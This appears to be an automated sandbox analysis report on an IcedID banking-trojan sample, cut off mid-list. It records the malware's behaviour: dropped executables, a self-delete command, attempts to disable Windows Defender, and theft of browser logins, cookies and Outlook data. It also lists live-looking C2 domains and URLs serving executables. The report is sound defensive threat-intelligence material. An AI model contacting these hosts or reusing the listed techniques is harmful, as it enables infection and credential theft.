IcedID_a36b52c9b4a33691b5caa7809525858c_jpg_2019-06-27_11_30

1.  
2. [*] MalFamily: "Icedid"
3.  
4. [*] MalScore: 10.0
5.  
6. [*] File Name: "Exes_a36b52c9b4a33691b5caa7809525858c.jpg"
7. [*] File Size: 65536
8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
9. [*] SHA256: "18f32d000404292cfdb95fade8e5138af87377240fdd37b0d21bf460d5ea0f63"
10. [*] MD5: "a36b52c9b4a33691b5caa7809525858c"
11. [*] SHA1: "f308a4293eafd2f97435476559e4967ce76bb154"
12. [*] SHA512: "7ba550118563147f12165ab32e361ede93e8b5bb9aa0a9f44a11c46b25c8aedcff80aaf916f66fc440a4da48cc412813d721c1f0838ab984726d7e2963b26f8a"
13. [*] CRC32: "F383820B"
14. [*] SSDEEP: "1536:2wZCkwcab1ULG6I1OGYKsTDecmIeP3Xlm85ppm21Owk:2db1FN1DYKsPUIOXlmglOwk"
15.  
16. [*] Process Execution: [
17. "Exes_a36b52c9b4a33691b5caa7809525858c.jpg",
18. "Exes_a36b52c9b4a33691b5caa7809525858c.jpg",
19. "Exes_a36b52c9b4a33691b5caa7809525858c.jpg",
20. "Exes_a36b52c9b4a33691b5caa7809525858c.jpg",
21. "svchost.exe",
22. "meaykdxuvtfy.exe",
23. "cmd.exe",
24. "powershell.exe",
25. "svchost.exe",
26. "svchost.exe",
27. "reayx.exe",
28. "cmd.exe",
29. "powershell.exe",
30. "cmd.exe",
31. "sc.exe",
32. "cmd.exe",
33. "sc.exe",
34. "cmd.exe",
35. "sc.exe",
36. "cmd.exe",
37. "sc.exe",
38. "cmd.exe",
39. "powershell.exe",
40. "teayx.exe",
41. "cmd.exe",
42. "powershell.exe",
43. "cmd.exe",
44. "sc.exe",
45. "cmd.exe",
46. "sc.exe",
47. "svchost.exe",
48. "fykqg.exe",
49. "fykqg.exe",
50. "cmd.exe",
51. "timeout.exe",
52. "svchost.exe",
53. "svchost.exe",
54. "services.exe",
55. "svchost.exe",
56. "WMIADAP.exe",
57. "taskeng.exe",
58. "taskeng.exe",
59. "msoia.exe",
60. "msoia.exe",
61. "lsass.exe",
62. "svchost.exe",
63. "WmiPrvSE.exe",
64. "svchost.exe"
65. ]
66.  
67. [*] Signatures Detected: [
68. {
69. "Description": "Creates RWX memory",
70. "Details": []
71. },
72. {
73. "Description": "Possible date expiration check, exits too soon after checking local time",
74. "Details": [
75. {
76. "process": "cmd.exe, PID 2252"
77. }
78. ]
79. },
80. {
81. "Description": "A process attempted to delay the analysis task.",
82. "Details": [
83. {
84. "Process": "svchost.exe tried to sleep 1353 seconds, actually delayed analysis time by 0 seconds"
85. },
86. {
87. "Process": "WmiPrvSE.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
88. }
89. ]
90. },
91. {
92. "Description": "Attempts to connect to a dead IP:Port (259 unique times)",
93. "Details": [
94. {
95. "IP": "169.254.255.254:445"
96. },
97. {
98. "IP": "169.254.255.254:445"
99. },
100. {
101. "IP": "169.254.255.254:445"
102. },
103. {
104. "IP": "169.254.255.254:445"
105. },
106. {
107. "IP": "169.254.255.254:445"
108. },
109. {
110. "IP": "169.254.255.254:445"
111. },
112. {
113. "IP": "169.254.255.254:445"
114. },
115. {
116. "IP": "169.254.255.254:445"
117. },
118. {
119. "IP": "169.254.255.254:445"
120. },
121. {
122. "IP": "169.254.255.254:445"
123. },
124. {
125. "IP": "169.254.255.254:445"
126. },
127. {
128. "IP": "169.254.255.254:445"
129. },
130. {
131. "IP": "169.254.255.254:445"
132. },
133. {
134. "IP": "169.254.255.254:445"
135. },
136. {
137. "IP": "169.254.255.254:445"
138. },
139. {
140. "IP": "169.254.255.254:445"
141. },
142. {
143. "IP": "169.254.255.254:445"
144. },
145. {
146. "IP": "169.254.255.254:445"
147. },
148. {
149. "IP": "169.254.255.254:445"
150. },
151. {
152. "IP": "169.254.255.254:445"
153. },
154. {
155. "IP": "169.254.255.254:445"
156. },
157. {
158. "IP": "169.254.255.254:445"
159. },
160. {
161. "IP": "169.254.255.254:445"
162. },
163. {
164. "IP": "169.254.255.254:445"
165. },
166. {
167. "IP": "169.254.255.254:445"
168. },
169. {
170. "IP": "169.254.255.254:445"
171. },
172. {
173. "IP": "169.254.255.254:445"
174. },
175. {
176. "IP": "169.254.255.254:445"
177. },
178. {
179. "IP": "169.254.255.254:445"
180. },
181. {
182. "IP": "169.254.255.254:445"
183. },
184. {
185. "IP": "169.254.255.254:445"
186. },
187. {
188. "IP": "169.254.255.254:445"
189. },
190. {
191. "IP": "169.254.255.254:445"
192. },
193. {
194. "IP": "169.254.255.254:445"
195. },
196. {
197. "IP": "169.254.255.254:445"
198. },
199. {
200. "IP": "169.254.255.254:445"
201. },
202. {
203. "IP": "169.254.255.254:445"
204. },
205. {
206. "IP": "169.254.255.254:445"
207. },
208. {
209. "IP": "169.254.255.254:445"
210. },
211. {
212. "IP": "169.254.255.254:445"
213. },
214. {
215. "IP": "169.254.255.254:445"
216. },
217. {
218. "IP": "169.254.255.254:445"
219. },
220. {
221. "IP": "93.189.149.176:443"
222. },
223. {
224. "IP": "141.255.166.157:443"
225. },
226. {
227. "IP": "169.254.255.254:445"
228. },
229. {
230. "IP": "169.254.255.254:445"
231. },
232. {
233. "IP": "169.254.255.254:445"
234. },
235. {
236. "IP": "169.254.255.254:445"
237. },
238. {
239. "IP": "169.254.255.254:445"
240. },
241. {
242. "IP": "169.254.255.254:445"
243. },
244. {
245. "IP": "169.254.255.254:445"
246. },
247. {
248. "IP": "169.254.255.254:445"
249. },
250. {
251. "IP": "169.254.255.254:445"
252. },
253. {
254. "IP": "169.254.255.254:445"
255. },
256. {
257. "IP": "169.254.255.254:445"
258. },
259. {
260. "IP": "169.254.255.254:445"
261. },
262. {
263. "IP": "169.254.255.254:445"
264. },
265. {
266. "IP": "169.254.255.254:445"
267. },
268. {
269. "IP": "169.254.255.254:445"
270. },
271. {
272. "IP": "169.254.255.254:445"
273. },
274. {
275. "IP": "169.254.255.254:445"
276. },
277. {
278. "IP": "169.254.255.254:445"
279. },
280. {
281. "IP": "169.254.255.254:445"
282. },
283. {
284. "IP": "169.254.255.254:445"
285. },
286. {
287. "IP": "169.254.255.254:445"
288. },
289. {
290. "IP": "169.254.255.254:445"
291. },
292. {
293. "IP": "169.254.255.254:445"
294. },
295. {
296. "IP": "169.254.255.254:445"
297. },
298. {
299. "IP": "169.254.255.254:445"
300. },
301. {
302. "IP": "169.254.255.254:445"
303. },
304. {
305. "IP": "169.254.255.254:445"
306. },
307. {
308. "IP": "169.254.255.254:445"
309. },
310. {
311. "IP": "169.254.255.254:445"
312. },
313. {
314. "IP": "169.254.255.254:445"
315. },
316. {
317. "IP": "169.254.255.254:445"
318. },
319. {
320. "IP": "169.254.255.254:445"
321. },
322. {
323. "IP": "185.143.145.90:443"
324. },
325. {
326. "IP": "169.254.255.254:445"
327. },
328. {
329. "IP": "169.254.255.254:445"
330. },
331. {
332. "IP": "169.254.255.254:445"
333. },
334. {
335. "IP": "169.254.255.254:445"
336. },
337. {
338. "IP": "169.254.255.254:445"
339. },
340. {
341. "IP": "169.254.255.254:445"
342. },
343. {
344. "IP": "169.254.255.254:445"
345. },
346. {
347. "IP": "169.254.255.254:445"
348. },
349. {
350. "IP": "169.254.255.254:445"
351. },
352. {
353. "IP": "169.254.255.254:445"
354. },
355. {
356. "IP": "169.254.255.254:445"
357. },
358. {
359. "IP": "169.254.255.254:445"
360. },
361. {
362. "IP": "169.254.255.254:445"
363. },
364. {
365. "IP": "169.254.255.254:445"
366. },
367. {
368. "IP": "169.254.255.254:445"
369. },
370. {
371. "IP": "169.254.255.254:445"
372. },
373. {
374. "IP": "169.254.255.254:445"
375. },
376. {
377. "IP": "169.254.255.254:445"
378. },
379. {
380. "IP": "169.254.255.254:445"
381. },
382. {
383. "IP": "169.254.255.254:445"
384. },
385. {
386. "IP": "169.254.255.254:445"
387. },
388. {
389. "IP": "169.254.255.254:445"
390. },
391. {
392. "IP": "169.254.255.254:445"
393. },
394. {
395. "IP": "169.254.255.254:445"
396. },
397. {
398. "IP": "169.254.255.254:445"
399. },
400. {
401. "IP": "169.254.255.254:445"
402. },
403. {
404. "IP": "169.254.255.254:445"
405. },
406. {
407. "IP": "169.254.255.254:445"
408. },
409. {
410. "IP": "169.254.255.254:445"
411. },
412. {
413. "IP": "169.254.255.254:445"
414. },
415. {
416. "IP": "169.254.255.254:445"
417. },
418. {
419. "IP": "169.254.255.254:445"
420. },
421. {
422. "IP": "169.254.255.254:445"
423. },
424. {
425. "IP": "169.254.255.254:445"
426. },
427. {
428. "IP": "169.254.255.254:445"
429. },
430. {
431. "IP": "169.254.255.254:445"
432. },
433. {
434. "IP": "169.254.255.254:445"
435. },
436. {
437. "IP": "169.254.255.254:445"
438. },
439. {
440. "IP": "169.254.255.254:445"
441. },
442. {
443. "IP": "169.254.255.254:445"
444. },
445. {
446. "IP": "169.254.255.254:445"
447. },
448. {
449. "IP": "169.254.255.254:445"
450. },
451. {
452. "IP": "169.254.255.254:445"
453. },
454. {
455. "IP": "169.254.255.254:445"
456. },
457. {
458. "IP": "169.254.255.254:445"
459. },
460. {
461. "IP": "169.254.255.254:445"
462. },
463. {
464. "IP": "169.254.255.254:445"
465. },
466. {
467. "IP": "169.254.255.254:445"
468. },
469. {
470. "IP": "169.254.255.254:445"
471. },
472. {
473. "IP": "169.254.255.254:445"
474. },
475. {
476. "IP": "169.254.255.254:445"
477. },
478. {
479. "IP": "169.254.255.254:445"
480. },
481. {
482. "IP": "169.254.255.254:445"
483. },
484. {
485. "IP": "169.254.255.254:445"
486. },
487. {
488. "IP": "169.254.255.254:445"
489. },
490. {
491. "IP": "169.254.255.254:445"
492. },
493. {
494. "IP": "169.254.255.254:445"
495. },
496. {
497. "IP": "169.254.255.254:445"
498. },
499. {
500. "IP": "169.254.255.254:445"
501. },
502. {
503. "IP": "169.254.255.254:445"
504. },
505. {
506. "IP": "169.254.255.254:445"
507. },
508. {
509. "IP": "169.254.255.254:445"
510. },
511. {
512. "IP": "169.254.255.254:445"
513. },
514. {
515. "IP": "169.254.255.254:445"
516. },
517. {
518. "IP": "169.254.255.254:445"
519. },
520. {
521. "IP": "169.254.255.254:445"
522. },
523. {
524. "IP": "169.254.255.254:445"
525. },
526. {
527. "IP": "169.254.255.254:445"
528. },
529. {
530. "IP": "169.254.255.254:445"
531. },
532. {
533. "IP": "169.254.255.254:445"
534. },
535. {
536. "IP": "169.254.255.254:445"
537. },
538. {
539. "IP": "169.254.255.254:445"
540. },
541. {
542. "IP": "169.254.255.254:445"
543. },
544. {
545. "IP": "169.254.255.254:445"
546. },
547. {
548. "IP": "169.254.255.254:445"
549. },
550. {
551. "IP": "169.254.255.254:445"
552. },
553. {
554. "IP": "169.254.255.254:445"
555. },
556. {
557. "IP": "169.254.255.254:445"
558. },
559. {
560. "IP": "169.254.255.254:445"
561. },
562. {
563. "IP": "169.254.255.254:445"
564. },
565. {
566. "IP": "169.254.255.254:445"
567. },
568. {
569. "IP": "169.254.255.254:445"
570. },
571. {
572. "IP": "169.254.255.254:445"
573. },
574. {
575. "IP": "169.254.255.254:445"
576. },
577. {
578. "IP": "169.254.255.254:445"
579. },
580. {
581. "IP": "169.254.255.254:445"
582. },
583. {
584. "IP": "169.254.255.254:445"
585. },
586. {
587. "IP": "169.254.255.254:445"
588. },
589. {
590. "IP": "169.254.255.254:445"
591. },
592. {
593. "IP": "169.254.255.254:445"
594. },
595. {
596. "IP": "169.254.255.254:445"
597. },
598. {
599. "IP": "169.254.255.254:445"
600. },
601. {
602. "IP": "169.254.255.254:445"
603. },
604. {
605. "IP": "169.254.255.254:445"
606. },
607. {
608. "IP": "169.254.255.254:445"
609. },
610. {
611. "IP": "169.254.255.254:445"
612. },
613. {
614. "IP": "169.254.255.254:445"
615. },
616. {
617. "IP": "169.254.255.254:445"
618. },
619. {
620. "IP": "169.254.255.254:445"
621. },
622. {
623. "IP": "169.254.255.254:445"
624. },
625. {
626. "IP": "169.254.255.254:445"
627. },
628. {
629. "IP": "169.254.255.254:445"
630. },
631. {
632. "IP": "169.254.255.254:445"
633. },
634. {
635. "IP": "169.254.255.254:445"
636. },
637. {
638. "IP": "169.254.255.254:445"
639. },
640. {
641. "IP": "169.254.255.254:445"
642. },
643. {
644. "IP": "169.254.255.254:445"
645. },
646. {
647. "IP": "169.254.255.254:445"
648. },
649. {
650. "IP": "169.254.255.254:445"
651. },
652. {
653. "IP": "169.254.255.254:445"
654. },
655. {
656. "IP": "169.254.255.254:445"
657. },
658. {
659. "IP": "169.254.255.254:445"
660. },
661. {
662. "IP": "169.254.255.254:445"
663. },
664. {
665. "IP": "169.254.255.254:445"
666. },
667. {
668. "IP": "169.254.255.254:445"
669. },
670. {
671. "IP": "205.185.216.10:80"
672. },
673. {
674. "IP": "169.254.255.254:445"
675. },
676. {
677. "IP": "169.254.255.254:445"
678. },
679. {
680. "IP": "169.254.255.254:445"
681. },
682. {
683. "IP": "169.254.255.254:445"
684. },
685. {
686. "IP": "169.254.255.254:445"
687. },
688. {
689. "IP": "169.254.255.254:445"
690. },
691. {
692. "IP": "169.254.255.254:445"
693. },
694. {
695. "IP": "169.254.255.254:445"
696. },
697. {
698. "IP": "169.254.255.254:445"
699. },
700. {
701. "IP": "169.254.255.254:445"
702. },
703. {
704. "IP": "169.254.255.254:445"
705. },
706. {
707. "IP": "169.254.255.254:445"
708. },
709. {
710. "IP": "169.254.255.254:445"
711. },
712. {
713. "IP": "169.254.255.254:445"
714. },
715. {
716. "IP": "169.254.255.254:445"
717. },
718. {
719. "IP": "169.254.255.254:445"
720. },
721. {
722. "IP": "169.254.255.254:445"
723. },
724. {
725. "IP": "169.254.255.254:445"
726. },
727. {
728. "IP": "169.254.255.254:445"
729. },
730. {
731. "IP": "169.254.255.254:445"
732. },
733. {
734. "IP": "169.254.255.254:445"
735. },
736. {
737. "IP": "169.254.255.254:445"
738. },
739. {
740. "IP": "169.254.255.254:445"
741. },
742. {
743. "IP": "169.254.255.254:445"
744. },
745. {
746. "IP": "169.254.255.254:445"
747. },
748. {
749. "IP": "169.254.255.254:445"
750. },
751. {
752. "IP": "169.254.255.254:445"
753. },
754. {
755. "IP": "169.254.255.254:445"
756. },
757. {
758. "IP": "169.254.255.254:445"
759. },
760. {
761. "IP": "169.254.255.254:445"
762. },
763. {
764. "IP": "169.254.255.254:445"
765. },
766. {
767. "IP": "169.254.255.254:445"
768. },
769. {
770. "IP": "169.254.255.254:445"
771. },
772. {
773. "IP": "169.254.255.254:445"
774. },
775. {
776. "IP": "169.254.255.254:445"
777. },
778. {
779. "IP": "169.254.255.254:445"
780. },
781. {
782. "IP": "169.254.255.254:445"
783. },
784. {
785. "IP": "169.254.255.254:445"
786. },
787. {
788. "IP": "169.254.255.254:445"
789. },
790. {
791. "IP": "169.254.255.254:445"
792. },
793. {
794. "IP": "169.254.255.254:445"
795. },
796. {
797. "IP": "169.254.255.254:445"
798. },
799. {
800. "IP": "169.254.255.254:445"
801. },
802. {
803. "IP": "169.254.255.254:445"
804. },
805. {
806. "IP": "169.254.255.254:445"
807. },
808. {
809. "IP": "169.254.255.254:445"
810. },
811. {
812. "IP": "169.254.255.254:445"
813. },
814. {
815. "IP": "169.254.255.254:445"
816. },
817. {
818. "IP": "169.254.255.254:445"
819. },
820. {
821. "IP": "169.254.255.254:445"
822. },
823. {
824. "IP": "169.254.255.254:445"
825. },
826. {
827. "IP": "169.254.255.254:445"
828. },
829. {
830. "IP": "169.254.255.254:445"
831. },
832. {
833. "IP": "169.254.255.254:445"
834. },
835. {
836. "IP": "169.254.255.254:445"
837. },
838. {
839. "IP": "169.254.255.254:445"
840. },
841. {
842. "IP": "169.254.255.254:445"
843. },
844. {
845. "IP": "169.254.255.254:445"
846. },
847. {
848. "IP": "169.254.255.254:445"
849. },
850. {
851. "IP": "169.254.255.254:445"
852. },
853. {
854. "IP": "169.254.255.254:445"
855. },
856. {
857. "IP": "169.254.255.254:445"
858. },
859. {
860. "IP": "169.254.255.254:445"
861. },
862. {
863. "IP": "169.254.255.254:445"
864. },
865. {
866. "IP": "169.254.255.254:445"
867. },
868. {
869. "IP": "169.254.255.254:445"
870. }
871. ]
872. },
873. {
874. "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
875. "Details": [
876. {
877. "ioc": "mechangerous.space"
878. },
879. {
880. "ioc": "bandstreat.pro"
881. },
882. {
883. "ioc": "rolescene.xyz"
884. },
885. {
886. "ioc": "therlanding.xyz"
887. },
888. {
889. "ioc": "saudienter.pw"
890. },
891. {
892. "ioc": "forsynanchyv.com"
893. },
894. {
895. "ioc": "hipponexunam.org"
896. },
897. {
898. "ioc": "charactic.pro"
899. },
900. {
901. "ioc": "egainvisit.pw"
902. },
903. {
904. "ioc": "thussailled.pw"
905. },
906. {
907. "ioc": "tradication.pw"
908. },
909. {
910. "ioc": "minoriticipal.pw"
911. },
912. {
913. "ioc": "seconominist.com"
914. },
915. {
916. "ioc": "importional.com"
917. }
918. ]
919. },
920. {
921. "Description": "Starts servers listening on 127.0.0.1:63953",
922. "Details": []
923. },
924. {
925. "Description": "Expresses interest in specific running processes",
926. "Details": [
927. {
928. "process": "lsass.exe"
929. }
930. ]
931. },
932. {
933. "Description": "A process created a hidden window",
934. "Details": [
935. {
936. "Process": "Exes_a36b52c9b4a33691b5caa7809525858c.jpg -> C:\\Users\\user\\AppData\\Local\\Temp\\Exes_a36b52c9b4a33691b5caa7809525858c.jpg"
937. },
938. {
939. "Process": "Exes_a36b52c9b4a33691b5caa7809525858c.jpg -> C:\\Users\\user\\AppData\\Local\\Temp\\Exes_a36b52c9b4a33691b5caa7809525858c.jpg"
940. },
941. {
942. "Process": "svchost.exe -> \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE"
943. },
944. {
945. "Process": "reayx.exe -> cmd"
946. },
947. {
948. "Process": "reayx.exe -> cmd"
949. },
950. {
951. "Process": "reayx.exe -> cmd"
952. },
953. {
954. "Process": "fykqg.exe -> C:\\Users\\user\\AppData\\Local\\Temp\\fykqg.exe"
955. },
956. {
957. "Process": "fykqg.exe -> cmd.exe cmd.exe /c timeout 1 && del C:\\Users\\user\\AppData\\Local\\Temp\\fykqg.exe\""
958. },
959. {
960. "Process": "teayx.exe -> cmd"
961. },
962. {
963. "Process": "teayx.exe -> cmd"
964. },
965. {
966. "Process": "teayx.exe -> cmd"
967. }
968. ]
969. },
970. {
971. "Description": "Drops a binary and executes it",
972. "Details": [
973. {
974. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\fykqg.exe"
975. },
976. {
977. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\reayx.exe"
978. },
979. {
980. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\meaykdxuvtfy.exe"
981. },
982. {
983. "binary": "C:\\Users\\user\\AppData\\Roaming\\diskram\\teayx.exe"
984. }
985. ]
986. },
987. {
988. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
989. "Details": [
990. {
991. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
992. },
993. {
994. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
995. },
996. {
997. "suspicious_request": "http://91.235.129.55/Tini86_cr.exe"
998. },
999. {
1000. "suspicious_request": "http://91.235.129.55/SWKLPFVBDX.exe"
1001. },
1002. {
1003. "suspicious_request": "http://91.235.129.55/tin.exe"
1004. },
1005. {
1006. "suspicious_request": "http://91.235.129.55/sin.png"
1007. },
1008. {
1009. "suspicious_request": "http://thussailled.pw/data2.php?AC4DF4415831AF68"
1010. },
1011. {
1012. "suspicious_request": "http://91.235.129.55/tin.png"
1013. },
1014. {
1015. "suspicious_request": "http://91.235.129.55/win.png"
1016. }
1017. ]
1018. },
1019. {
1020. "Description": "Performs some HTTP requests",
1021. "Details": [
1022. {
1023. "url": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
1024. },
1025. {
1026. "url": "http://91.235.129.55/Tini86_cr.exe"
1027. },
1028. {
1029. "url": "http://91.235.129.55/SWKLPFVBDX.exe"
1030. },
1031. {
1032. "url": "http://91.235.129.55/tin.exe"
1033. },
1034. {
1035. "url": "http://91.235.129.55/sin.png"
1036. },
1037. {
1038. "url": "http://thussailled.pw/data2.php?AC4DF4415831AF68"
1039. },
1040. {
1041. "url": "http://91.235.129.55/tin.png"
1042. },
1043. {
1044. "url": "http://91.235.129.55/win.png"
1045. }
1046. ]
1047. },
1048. {
1049. "Description": "Executed a process and injected code into it, probably while unpacking",
1050. "Details": [
1051. {
1052. "Injection": "Exes_a36b52c9b4a33691b5caa7809525858c.jpg(1464) -> Exes_a36b52c9b4a33691b5caa7809525858c.jpg(2208)"
1053. }
1054. ]
1055. },
1056. {
1057. "Description": "Attempts to stop active services",
1058. "Details": [
1059. {
1060. "servicename": "WinDefend"
1061. }
1062. ]
1063. },
1064. {
1065. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
1066. "Details": [
1067. {
1068. "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 4574800 times"
1069. }
1070. ]
1071. },
1072. {
1073. "Description": "Steals private information from local Internet browsers",
1074. "Details": [
1075. {
1076. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@doubleclick[1].txt"
1077. },
1078. {
1079. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@advertising[1].txt"
1080. },
1081. {
1082. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google[4].txt"
1083. },
1084. {
1085. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google[1].txt"
1086. },
1087. {
1088. "file": "C:\\Users\\user\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Web Data"
1089. },
1090. {
1091. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@media[2].txt"
1092. },
1093. {
1094. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@scorecardresearch[2].txt"
1095. },
1096. {
1097. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
1098. },
1099. {
1100. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.msn[2].txt"
1101. },
1102. {
1103. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
1104. },
1105. {
1106. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@msn[1].txt"
1107. },
1108. {
1109. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@bing[2].txt"
1110. },
1111. {
1112. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@3lift[1].txt"
1113. },
1114. {
1115. "file": "C:\\Users\\user\\AppData\\Local\\Chromium\\User Data\\Default\\Web Data"
1116. },
1117. {
1118. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google[3].txt"
1119. },
1120. {
1121. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.msn[2].txt"
1122. },
1123. {
1124. "file": "C:\\Users\\user\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data"
1125. },
1126. {
1127. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@atwola[2].txt"
1128. },
1129. {
1130. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.bing[2].txt"
1131. },
1132. {
1133. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.google[1].txt"
1134. },
1135. {
1136. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google[5].txt"
1137. },
1138. {
1139. "file": "C:\\Users\\user\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data"
1140. }
1141. ]
1142. },
1143. {
1144. "Description": "Spoofs its process name and/or associated pathname to appear as a legitimate process",
1145. "Details": [
1146. {
1147. "modified_name": "svchost.exe",
1148. "modified_path": "C:\\Users\\user\\AppData\\Roaming\\diskram\\teayx.exe",
1149. "original_name": "svchost.exe",
1150. "original_path": "C:\\Windows\\system32\\svchost.exe"
1151. }
1152. ]
1153. },
1154. {
1155. "Description": "Creates a hidden or system file",
1156. "Details": [
1157. {
1158. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF12ade02.TMP"
1159. },
1160. {
1161. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF12b38b5.TMP"
1162. },
1163. {
1164. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF12b7a32.TMP"
1165. }
1166. ]
1167. },
1168. {
1169. "Description": "File has been identified by 36 Antiviruses on VirusTotal as malicious",
1170. "Details": [
1171. {
1172. "FireEye": "Generic.mg.a36b52c9b4a33691"
1173. },
1174. {
1175. "McAfee": "RDN/Generic.cf"
1176. },
1177. {
1178. "Malwarebytes": "Trojan.Banker"
1179. },
1180. {
1181. "CrowdStrike": "win/malicious_confidence_60% (D)"
1182. },
1183. {
1184. "Alibaba": "TrojanBanker:Win32/IcedID.ae58612b"
1185. },
1186. {
1187. "NANO-Antivirus": "Trojan.Win32.IcedID.frqgbq"
1188. },
1189. {
1190. "Symantec": "Trojan.Gen.MBT"
1191. },
1192. {
1193. "ESET-NOD32": "a variant of Win32/GenKryptik.DLAC"
1194. },
1195. {
1196. "APEX": "Malicious"
1197. },
1198. {
1199. "Avast": "Win32:Malware-gen"
1200. },
1201. {
1202. "Kaspersky": "Trojan-Banker.Win32.IcedID.tsxr"
1203. },
1204. {
1205. "Paloalto": "generic.ml"
1206. },
1207. {
1208. "Tencent": "Win32.Trojan.Inject.Auto"
1209. },
1210. {
1211. "Endgame": "malicious (high confidence)"
1212. },
1213. {
1214. "Emsisoft": "Trojan-Banker.Trickster (A)"
1215. },
1216. {
1217. "Comodo": "TrojWare.Win32.IcedID.VP@896nhl"
1218. },
1219. {
1220. "F-Secure": "Trojan.TR/AD.IcedId.guhcl"
1221. },
1222. {
1223. "DrWeb": "Trojan.Inject3.17374"
1224. },
1225. {
1226. "Zillya": "Trojan.GenKryptik.Win32.31136"
1227. },
1228. {
1229. "McAfee-GW-Edition": "RDN/Generic.cf"
1230. },
1231. {
1232. "Sophos": "Mal/Generic-S"
1233. },
1234. {
1235. "Webroot": "W32.Adware.Gen"
1236. },
1237. {
1238. "Avira": "TR/AD.IcedId.guhcl"
1239. },
1240. {
1241. "Antiy-AVL": "Trojan[Banker]/Win32.IcedID"
1242. },
1243. {
1244. "Microsoft": "Trojan:Win32/Tiggre!plock"
1245. },
1246. {
1247. "ZoneAlarm": "Trojan-Banker.Win32.IcedID.tsxr"
1248. },
1249. {
1250. "GData": "Win32.Trojan.Agent.O3FHA9"
1251. },
1252. {
1253. "AhnLab-V3": "Malware/Win32.Generic.C3294845"
1254. },
1255. {
1256. "Acronis": "suspicious"
1257. },
1258. {
1259. "VBA32": "BScope.Trojan.Iceid"
1260. },
1261. {
1262. "TrendMicro-HouseCall": "TROJ_GEN.R03BC0PFL19"
1263. },
1264. {
1265. "Rising": "Trojan.GenKryptik!8.AA55 (CLOUD)"
1266. },
1267. {
1268. "Ikarus": "Trojan.Win32.Trickbot"
1269. },
1270. {
1271. "Fortinet": "W32/Kryptik.GUBD!tr"
1272. },
1273. {
1274. "AVG": "Win32:Malware-gen"
1275. },
1276. {
1277. "Panda": "Trj/GdSda.A"
1278. }
1279. ]
1280. },
1281. {
1282. "Description": "Attempts to disable Windows Defender",
1283. "Details": []
1284. },
1285. {
1286. "Description": "Harvests information related to installed mail clients",
1287. "Details": [
1288. {
1289. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
1290. },
1291. {
1292. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
1293. },
1294. {
1295. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\11.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
1296. },
1297. {
1298. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
1299. },
1300. {
1301. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
1302. },
1303. {
1304. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
1305. },
1306. {
1307. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\13.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
1308. },
1309. {
1310. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
1311. },
1312. {
